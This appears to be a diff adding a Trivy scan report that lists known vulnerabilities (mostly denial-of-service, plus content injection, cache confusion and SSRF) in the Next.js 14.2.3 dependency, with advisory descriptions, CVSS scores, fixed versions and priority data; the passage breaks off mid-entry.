+ id: 3cc6d1d18936ff7b + ruleId: GHSA-h25m-26qc-wcjf + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js HTTP request deserialization can lead to DoS when using insecure + React Server Components + title: GHSA-h25m-26qc-wcjf + description: 'A vulnerability affects certain React Server Components packages for + versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, + including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is + tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg). + + + A specially crafted HTTP request can be sent to any App Router Server Function + endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory + exceptions, or server crashes. This can result in denial of service in unpatched + environments.' + remediation: https://github.com/advisories/GHSA-h25m-26qc-wcjf + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + raw: + VulnerabilityID: GHSA-h25m-26qc-wcjf + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, + 16.0.11, 16.1.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-h25m-26qc-wcjf + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b + Title: Next.js HTTP request deserialization can lead to DoS when using insecure + React Server Components + Description: 'A vulnerability affects certain React Server Components packages + for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected + packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. + The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg). + + + A specially crafted HTTP request can be sent to any App Router Server Function + endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory + exceptions, or server crashes. This can result in denial of service in unpatched + environments.' + Severity: HIGH + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf + - https://nvd.nist.gov/vuln/detail/CVE-2026-23864 + - https://vercel.com/changelog/summary-of-cve-2026-23864 + PublishedDate: '2026-01-28T15:38:01Z' + LastModifiedDate: '2026-01-28T15:38:01Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2384ada699a3c38e + ruleId: GHSA-mwv6-3258-q52c + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next Vulnerable to Denial of Service with Server Components + title: GHSA-mwv6-3258-q52c + description: 'A vulnerability affects certain React packages for versions 19.0.0, + 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the + affected packages, including Next.js 15.x and 16.x using the App Router. The issue + is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184). + + + A malicious HTTP request can be crafted and sent to any App Router endpoint that, + when deserialized, can cause the server process to hang and consume CPU. This + can result in denial of service in unpatched environments.' + remediation: https://github.com/advisories/GHSA-mwv6-3258-q52c + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + raw: + VulnerabilityID: GHSA-mwv6-3258-q52c + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, + 16.0.9, 16.1.0-canary.17 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-mwv6-3258-q52c + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a + Title: Next Vulnerable to Denial of Service with Server Components + Description: 'A vulnerability affects certain React packages for versions 19.0.0, + 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the + affected packages, including Next.js 15.x and 16.x using the App Router. The + issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184). + + + A malicious HTTP request can be crafted and sent to any App Router endpoint + that, when deserialized, can cause the server process to hang and consume CPU. + This can result in denial of service in unpatched environments.' + Severity: HIGH + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c + - https://nextjs.org/blog/security-update-2025-12-11 + - https://www.cve.org/CVERecord?id=CVE-2025-55184 + PublishedDate: '2025-12-11T22:49:27Z' + LastModifiedDate: '2025-12-11T22:49:28Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9076a243c95555c6 + ruleId: GHSA-q4gf-8mx6-v5v3 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js has a Denial of Service with Server Components + title: GHSA-q4gf-8mx6-v5v3 + description: 'A vulnerability affects certain React Server Components packages for + versions 19.x and frameworks that use the affected packages, including Next.js + 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream + as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). + You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869). + + + A specially crafted HTTP request can be sent to any App Router Server Function + endpoint that, when deserialized, may trigger excessive CPU usage. This can result + in denial of service in unpatched environments.' + remediation: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + raw: + VulnerabilityID: GHSA-q4gf-8mx6-v5v3 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.15, 16.2.3 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-q4gf-8mx6-v5v3 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8 + Title: Next.js has a Denial of Service with Server Components + Description: 'A vulnerability affects certain React Server Components packages + for versions 19.x and frameworks that use the affected packages, including Next.js + 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream + as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). + You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869). + + + A specially crafted HTTP request can be sent to any App Router Server Function + endpoint that, when deserialized, may trigger excessive CPU usage. This can + result in denial of service in unpatched environments.' + Severity: HIGH + VendorSeverity: + ghsa: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3 + - https://vercel.com/changelog/summary-of-cve-2026-23869 + PublishedDate: '2026-04-10T15:35:47Z' + LastModifiedDate: '2026-04-10T15:35:47Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.333333333333336 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 85e92c5109af9055 + ruleId: CVE-2024-47831 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Next.js image optimization has Denial of Service condition' + title: CVE-2024-47831 + description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, + 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in + the image optimization feature which allows for a potential Denial of Service + (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` + file that is configured with `images.unoptimized` set to `true` or `images.loader` + set to a non-default value nor the Next.js application that is hosted on Vercel + are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, + ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` + or `images.loaderFile` assigned. + remediation: https://avd.aquasec.com/nvd/cve-2024-47831 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id029 + - CWE-674 + raw: + VulnerabilityID: CVE-2024-47831 + VendorIDs: + - GHSA-g77x-44xx-532m + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.7 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-47831 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81 + Title: 'next.js: Next.js image optimization has Denial of Service condition' + Description: Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, + 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability + in the image optimization feature which allows for a potential Denial of Service + (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` + file that is configured with `images.unoptimized` set to `true` or `images.loader` + set to a non-default value nor the Next.js application that is hosted on Vercel + are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, + ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` + or `images.loaderFile` assigned. + Severity: MEDIUM + CweIDs: *id029 + VendorSeverity: + ghsa: 2 + nvd: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U + V3Score: 5.9 + V40Score: 4.6 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 5.9 + References: + - https://access.redhat.com/security/cve/CVE-2024-47831 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a + - https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m + - https://nvd.nist.gov/vuln/detail/CVE-2024-47831 + - https://www.cve.org/CVERecord?id=CVE-2024-47831 + PublishedDate: '2024-10-14T18:15:05.013Z' + LastModifiedDate: '2024-11-08T15:39:21.823Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 14.029866666666669 + epss: 0.01306 + epss_percentile: 0.79982 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.05224 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ec4e4216710b1a54 + ruleId: CVE-2024-56332 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions' + title: CVE-2024-56332 + description: 'Next.js is a React framework for building full-stack web applications. + Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, + Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers + to construct requests that leaves requests to Server Actions hanging until the + hosting provider cancels the function execution. This vulnerability can also be + used as a Denial of Wallet (DoW) attack when deployed in providers billing by + response times. (Note: Next.js server is idle during that time and only keeps + the connection open. CPU and memory footprint are low during that time.). Deployments + without any protection against long running Server Action invocations are especially + vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration + on function execution to reduce the risk of excessive billing. This is the same + issue as if the incoming HTTP request has an invalid `Content-Length` header or + never closes. If the host has no other mitigations to those then this vulnerability + is novel. This vulnerability affects only Next.js deployments using Server Actions. + The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that + users upgrade to a safe version. There are no official workarounds.' + remediation: https://avd.aquasec.com/nvd/cve-2024-56332 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id030 + - CWE-770 + raw: + VulnerabilityID: CVE-2024-56332 + VendorIDs: + - GHSA-7m27-7ghc-44w9 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 13.5.8, 14.2.21, 15.1.2 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2024-56332 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5 + Title: 'next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions' + Description: 'Next.js is a React framework for building full-stack web applications. + Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, + Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers + to construct requests that leaves requests to Server Actions hanging until the + hosting provider cancels the function execution. This vulnerability can also + be used as a Denial of Wallet (DoW) attack when deployed in providers billing + by response times. (Note: Next.js server is idle during that time and only keeps + the connection open. CPU and memory footprint are low during that time.). Deployments + without any protection against long running Server Action invocations are especially + vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration + on function execution to reduce the risk of excessive billing. This is the same + issue as if the incoming HTTP request has an invalid `Content-Length` header + or never closes. If the host has no other mitigations to those then this vulnerability + is novel. This vulnerability affects only Next.js deployments using Server Actions. + The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend + that users upgrade to a safe version. There are no official workarounds.' + Severity: MEDIUM + CweIDs: *id030 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 5.3 + References: + - https://access.redhat.com/security/cve/CVE-2024-56332 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9 + - https://nvd.nist.gov/vuln/detail/CVE-2024-56332 + - https://www.cve.org/CVERecord?id=CVE-2024-56332 + PublishedDate: '2025-01-03T21:15:13.55Z' + LastModifiedDate: '2025-09-10T15:48:41.83Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.559466666666669 + epss: 0.00424 + epss_percentile: 0.62356 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.01696 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 396a9deaca66993c + ruleId: CVE-2025-55173 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization' + title: CVE-2025-55173 + description: Next.js is a React framework for building full-stack web applications. + In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization + is vulnerable to content injection. The issue allowed attacker-controlled external + image sources to trigger file downloads with arbitrary content and filenames under + specific configurations. This behavior could be abused for phishing or malicious + file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and + 15.4.5. + remediation: https://avd.aquasec.com/nvd/cve-2025-55173 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id031 + - CWE-20 + raw: + VulnerabilityID: CVE-2025-55173 + VendorIDs: + - GHSA-xv57-4mr9-wg8v + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.31, 15.4.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-55173 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e + Title: 'nextjs: Next.js Content Injection Vulnerability for Image Optimization' + Description: Next.js is a React framework for building full-stack web applications. + In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization + is vulnerable to content injection. The issue allowed attacker-controlled external + image sources to trigger file downloads with arbitrary content and filenames + under specific configurations. This behavior could be abused for phishing or + malicious file delivery. This vulnerability has been fixed in Next.js versions + 14.2.31 and 15.4.5. + Severity: MEDIUM + CweIDs: *id031 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + V3Score: 4.3 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + V3Score: 4.3 + References: + - http://vercel.com/changelog/cve-2025-55173 + - https://access.redhat.com/security/cve/CVE-2025-55173 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd + - https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v + - https://nvd.nist.gov/vuln/detail/CVE-2025-55173 + - https://vercel.com/changelog/cve-2025-55173 + - https://www.cve.org/CVERecord?id=CVE-2025-55173 + PublishedDate: '2025-08-29T22:15:31.75Z' + LastModifiedDate: '2025-09-08T16:42:57.183Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A03:2021 + cweTop25_2024: + - id: CWE-20 + rank: 4 + category: Input Validation + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.610133333333334 + epss: 0.00519 + epss_percentile: 0.67013 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0207600000000001 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 90791fc1fd7573b4 + ruleId: CVE-2025-57752 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization + API Routes' + title: CVE-2025-57752 + description: Next.js is a React framework for building full-stack web applications. + In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization + API routes are affected by cache key confusion. When images returned from API + routes vary based on request headers (such as Cookie or Authorization), these + responses could be incorrectly cached and served to unauthorized users due to + a cache key confusion bug. This vulnerability has been fixed in Next.js versions + 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes + to serve images that depend on request headers and have image optimization enabled. + remediation: https://avd.aquasec.com/nvd/cve-2025-57752 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id032 + - CWE-524 + raw: + VulnerabilityID: CVE-2025-57752 + VendorIDs: + - GHSA-g5qg-72qw-gw5v + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.31, 15.4.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57752 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a + Title: 'nextjs: Next.js Affected by Cache Key Confusion for Image Optimization + API Routes' + Description: Next.js is a React framework for building full-stack web applications. + In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization + API routes are affected by cache key confusion. When images returned from API + routes vary based on request headers (such as Cookie or Authorization), these + responses could be incorrectly cached and served to unauthorized users due to + a cache key confusion bug. This vulnerability has been fixed in Next.js versions + 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes + to serve images that depend on request headers and have image optimization enabled. + Severity: MEDIUM + CweIDs: *id032 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 6.2 + redhat: + V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 6.2 + References: + - https://access.redhat.com/security/cve/CVE-2025-57752 + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd + - https://github.com/vercel/next.js/pull/82114 + - https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v + - https://nvd.nist.gov/vuln/detail/CVE-2025-57752 + - https://vercel.com/changelog/cve-2025-57752 + - https://www.cve.org/CVERecord?id=CVE-2025-57752 + PublishedDate: '2025-08-29T22:15:31.963Z' + LastModifiedDate: '2025-09-08T16:43:50.33Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.391466666666664 + epss: 0.00109 + epss_percentile: 0.28624 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00436 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 027359ccd596dbb5 + ruleId: CVE-2025-57822 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js Improper Middleware Redirect Handling Leads to SSRF + title: CVE-2025-57822 + description: Next.js is a React framework for building full-stack web applications. + Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly + passing the request object, it could lead to SSRF in self-hosted applications + that incorrectly forwarded user-supplied headers. This vulnerability has been + fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware + logic in self-hosted environments are strongly encouraged to upgrade and verify + correct usage of the next() function. + remediation: https://avd.aquasec.com/nvd/cve-2025-57822 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id033 + - CWE-918 + raw: + VulnerabilityID: CVE-2025-57822 + VendorIDs: + - GHSA-4342-x723-ch2f + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 14.2.32, 15.4.7 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-57822 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1 + Title: Next.js Improper Middleware Redirect Handling Leads to SSRF + Description: Next.js is a React framework for building full-stack web applications. + Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly + passing the request object, it could lead to SSRF in self-hosted applications + that incorrectly forwarded user-supplied headers. This vulnerability has been + fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom + middleware logic in self-hosted environments are strongly encouraged to upgrade + and verify correct usage of the next() function. + Severity: MEDIUM + CweIDs: *id033 + VendorSeverity: + ghsa: 2 + nvd: 3 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N + V3Score: 6.5 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N + V3Score: 8.2 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8 + - https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f + - https://nvd.nist.gov/vuln/detail/CVE-2025-57822 + - https://vercel.com/changelog/cve-2025-57822 + PublishedDate: '2025-08-29T22:15:32.143Z' + LastModifiedDate: '2025-09-08T16:41:41.253Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A10:2021 + cweTop25_2024: + - id: CWE-918 + rank: 19 + category: SSRF + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 17.501333333333335 + epss: 0.07815 + epss_percentile: 0.92065 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.3126 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 580a09237cbe3791 + ruleId: CVE-2025-59471 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'next: NextJS Denial of Service in Image Optimizer' + title: CVE-2025-59471 + description: "A denial of service vulnerability exists in self-hosted Next.js applications\ + \ that have `remotePatterns` configured for the Image Optimizer. The image optimization\ + \ endpoint (`/_next/image`) loads external images entirely into memory without\ + \ enforcing a maximum size limit, allowing an attacker to cause out-of-memory\ + \ conditions by requesting optimization of arbitrarily large images. This vulnerability\ + \ requires that `remotePatterns` is configured to allow image optimization from\ + \ external domains and that the attacker can serve or control a large image on\ + \ an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to\ + \ reduce risk and prevent availability issues in Next applications." + remediation: https://avd.aquasec.com/nvd/cve-2025-59471 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id034 + - CWE-400 + raw: + VulnerabilityID: CVE-2025-59471 + VendorIDs: + - GHSA-9g9p-9gw9-jx7f + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.10, 16.1.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-59471 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11 + Title: 'next: NextJS Denial of Service in Image Optimizer' + Description: "A denial of service vulnerability exists in self-hosted Next.js\ + \ applications that have `remotePatterns` configured for the Image Optimizer.\ + \ The image optimization endpoint (`/_next/image`) loads external images entirely\ + \ into memory without enforcing a maximum size limit, allowing an attacker to\ + \ cause out-of-memory conditions by requesting optimization of arbitrarily large\ + \ images. This vulnerability requires that `remotePatterns` is configured to\ + \ allow image optimization from external domains and that the attacker can serve\ + \ or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading\ + \ to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next\ + \ applications." + Severity: MEDIUM + CweIDs: *id034 + VendorSeverity: + ghsa: 2 + nvd: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 5.9 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 5.9 + 